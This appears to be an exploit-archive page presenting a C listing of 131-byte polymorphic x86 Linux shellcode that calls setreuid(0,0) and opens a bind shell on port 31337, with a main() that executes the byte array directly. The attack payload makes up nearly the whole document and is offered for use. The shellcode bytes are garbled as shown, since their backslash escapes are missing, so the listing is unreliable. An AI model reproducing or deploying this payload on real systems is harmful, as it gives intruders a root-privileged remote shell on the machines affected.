[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Polymorphic Bindport 31337 with setreuid (0,0) linux/x86
# Published : 2010-06-17
# Author : gunslinger_
# Previous Title : Linux/x86-64 - Disable ASLR Security - 143 bytes
# Next Title : Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 bytes


/*
Title  : Polymorphic shellcode that bindport to 31337 with setreuid (0,0) x86 linux shellcode.
Name   : 131 bytes bind port 31337 x86 linux polymorphic shellcode.
Date   : Sat Jun  17 21:27:03 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>

char bindport[] = "xebx11x5ex31xc9xb1x6bx80x6cx0exffx35x80xe9x01"
		  "x75xf6xebx05xe8xeaxffxffxffxe5x7bxbdx0ex02xb5"
		  "x66xf5x66x10x66x07x85x9fx36x9fx37xbex16x33xf8"
		  "xe5x9bx02xb5xbexfbx87x9dxf0x37xafx9exbex16x9f"
		  "x45x86x8bxbex16x33xf8xe5x9bx02xb5x87x8bxbex16"
		  "xe8x39xe5x9bx02xb5x87x87x8bxbex16x33xf8xe5x9b"
		  "x02xb5xbexf8x66xfexe5x74x02xb5x76xe5x74x02xb5"
		  "x76xe5x74x02xb5x87x9dx64x64xa8x9dx9dx64x97x9e"
		  "xa3xbex18x87x88xbex16xe5x40x02xb5";

int main(void)
{
	fprintf(stdout,"Length: %dn",strlen(bindport));
	(*(void(*)()) bindport)();
}